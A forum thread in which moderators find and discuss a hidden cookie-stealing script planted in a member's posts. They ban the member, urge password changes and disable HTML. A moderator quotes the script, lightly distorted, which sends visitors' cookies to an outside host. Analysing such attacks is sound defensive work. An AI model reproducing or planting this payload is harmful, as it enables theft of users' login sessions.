What the "hack" is this?

Status
This old topic is closed. If you want to reopen this topic, contact a moderator using the "Report Post" button.
Moderator
Joined 2003
Paid Member
Could it be this bit of invisible code in his posts:

<s********ript>window.open('http://members.lycos.nl/protect0rzgame/1.php?Bericht='+document.cookie+'&Bericht2=http://www.diyaudio.com/forums');</scr****ipt></font></p>

(script commands have been deliberately distorted to save replication)


Maybe the moderators should be more careful....;)
 
every time i click on a link i get spamed with posting's
 

Attachments

  • post.jpg
    post.jpg
    75.7 KB · Views: 249
Thanks for bringing my attention to this. Programx has been banned pending investigation. It is hard to tell the extent of the information stolen from a user when redirected to that script but there are good odds that complete login details have been stolen. Anyone who thinks they may have been affected should change their password as a matter of urgency. On behalf of the forum, its administrative team, the moderators and the site owner I would like to state once and for all that this was none of our doing.
 
Moderator
Joined 2003
Paid Member
AudioFreak said:
On behalf of the forum, its administrative team, the moderators and the site owner I would like to state once and for all that this was none of our doing.

Thanks AudioFreak
Of course it was never my intention to accuse the mods.
I have a rather high S/N ratio in feeling when something is wrong. :D
IMHO, the name "programx" and the location "test" was a good indication.
A real smart guy would have done better ;)

/Hugo :)
 
Ex-Moderator
Joined 2002
dhaen said:
Just a thought,

Was it wise to put through so many posts that had zero contibution? Stinks like a rat:darkside:

Believe it or not, us mods don't censor much, and we always err on the side of letting things through. Although we try to keep as tight a ship as possible, sometimes these things just slip through the cracks , sorry.

As AF said above, one of the best things you can do for your own security and peace of mind is regularly change your passwords, and this applies not just to diyAudio, but the 'net in general.
 
Switches things on and off again
Joined 2000
Paid Member
HTML has been disabled across the board to prevent this happening again. Sorry if it breaks some older posts using image tags etc.

Allowing HTML in posts is sadly in this day and age really limited to intranet applications, where theives do not roam freely.
 
Status
This old topic is closed. If you want to reopen this topic, contact a moderator using the "Report Post" button.